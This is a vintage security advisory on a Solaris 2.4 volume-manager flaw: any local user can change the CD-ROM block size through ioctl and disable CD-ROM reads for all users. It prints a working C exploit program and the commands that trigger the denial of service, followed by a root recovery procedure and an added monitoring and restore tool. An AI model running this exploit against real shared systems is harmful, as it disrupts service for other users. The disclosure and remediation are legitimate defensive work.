COMMAND

    Volume Manager & CD-ROM

SYSTEMS AFFECTED

    Solaris 2.4

PROBLEM

    Serge E. Pick found the following.  He tried to read Video and
    Audio data from a CD-ROM on an SS20 under Solaris 2.4 and noticed
    an interesting feature.  He read the data from the device managed
    by vold (the volume manager), i.e. /vol/dev/aliases/cdrom0 (or
    /vol/dev/rdsk/c0tX/<cd-name>).  Any user can access this device
    and change its parameters through an ioctl() call.

    If you are not careful, you can corrupt the CD-ROM management
    service.  When you work with a normal filesystem on a CD-ROM, the
    block size of the device is 512 bytes.  But to work with an Audio
    or Video CD, it is necessary to change the block size to 2336 or
    2352 bytes.

    This message contains a simple program to change the block size on
    the CD-ROM device.  To bring the service down, run:

        gcc -o setblk setblk.c
        ./setblk 2336
        eject

    Eject can be run by any user too.  After that, try to put the
    CD-ROM in again.  You will see on the console:

        incomplete reading -- retrying.

    After some retries the message will be:

        incomplete reading -- giving up.

    And the CD-ROM will be ejected.

    Without the eject, it will be impossible to read any data from
    files on the CD-ROM if the block mode is not equal to 512.  So any
    user can prevent the normal work of the system!  Exploit follows:

    ------------------------- program is here ------------------------
    /*
       Serge E. Pick (QuickPick), 19.08.1997
       Setblk set block size on CD-ROM device
       on Sparc Station/Server under Solaris 2.4/2.5
       Usage: setblk [<blksize>]
       Default: 512 bytes
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/uio.h>
    #include <sys/stat.h>
    #include <sys/cdio.h>
    #include <fcntl.h>
    #include <unistd.h>

    int main( int argc, char **argv )
    {
        int scd,st,size;

        /* open the vold-managed device; no special privilege is needed */
        scd = open("/vol/dev/aliases/cdrom0",O_RDONLY);
        if( scd==-1 ) {
            perror("Cannot open cdrom device");
            exit(1);
        }

        /* block size from the command line, 512 when no argument is given */
        if( argc<2 ) size = 512;
        else if( sscanf(argv[1],"%d",&size)!=1 ) {
            fprintf(stderr,"Usage: setblk [<blksize>]\n");
            exit(1);
        }

        /* main part */
        st = ioctl(scd,CDROMSBLKMODE,size);
        if( st==-1 ) perror("Unable to change blk size");
        else printf("Blk size changed to %d\n",size);

        close(scd);
        exit(st==-1 ? 1 : 0);
    }
    ------------------------- end of program -------------------------

SOLUTION

    To restore service, do the following (as root):

        1. /etc/rc2.d/S92volmgt stop
        2. Put the CD-ROM in the drive (you do not need to be root for this ;-)
        3. /etc/rc2.d/S92volmgt start

    After that the block size will be restored to 512.
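
    The check below is an added example, not part of the original
    advisory or of Serge E. Pick's program.  It reads the current
    block size of the vold-managed device and, when run with -r, puts
    it back to 512.  It assumes the CDROMGBLKMODE ioctl described with
    CDROMSBLKMODE in Solaris cdio(7) is available; the name
    blkmode_state and the -r option are made up for this example.

```c
/* Added example: report the CD-ROM block mode; with -r, set it back to 512. */
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#ifdef __sun
#include <stropts.h>
#include <sys/cdio.h>                 /* CDROMGBLKMODE, CDROMSBLKMODE */
#endif

#define CD_DEV     "/vol/dev/aliases/cdrom0"  /* path from the advisory */
#define FS_BLKSIZE 512                        /* filesystem block size */

/* 0 = filesystem mode, 1 = Audio/Video size named in the advisory,
   2 = any other value. States 1 and 2 both break filesystem reads. */
int blkmode_state(int size)
{
    if (size == FS_BLKSIZE) return 0;
    if (size == 2336 || size == 2352) return 1;
    return 2;
}

int main(int argc, char **argv)
{
#ifdef __sun
    int restore = (argc > 1 && strcmp(argv[1], "-r") == 0);
    int size = 0, state;
    int fd = open(CD_DEV, O_RDONLY);

    if (fd == -1) { perror(CD_DEV); return 2; }
    if (ioctl(fd, CDROMGBLKMODE, &size) == -1) {   /* third arg: int * */
        perror("CDROMGBLKMODE"); close(fd); return 2;
    }
    state = blkmode_state(size);
    printf("%s: block size %d (%s)\n", CD_DEV, size,
           state == 0 ? "ok" : state == 1 ? "audio/video mode" : "unexpected");
    if (state != 0 && restore) {
        if (ioctl(fd, CDROMSBLKMODE, FS_BLKSIZE) == -1) {
            perror("CDROMSBLKMODE"); close(fd); return 2;
        }
        printf("block size restored to %d\n", FS_BLKSIZE);
        state = 0;
    }
    close(fd);
    return state == 0 ? 0 : 1;   /* non-zero exit lets a periodic check alert */
#else
    (void)argc; (void)argv;
    fprintf(stderr, "needs Solaris <sys/cdio.h>\n");
    return 2;
#endif
}
```

    Running it with -r while someone is legitimately reading an Audio
    or Video CD will interrupt that read, so schedule only the
    report-only form and leave -r to an operator.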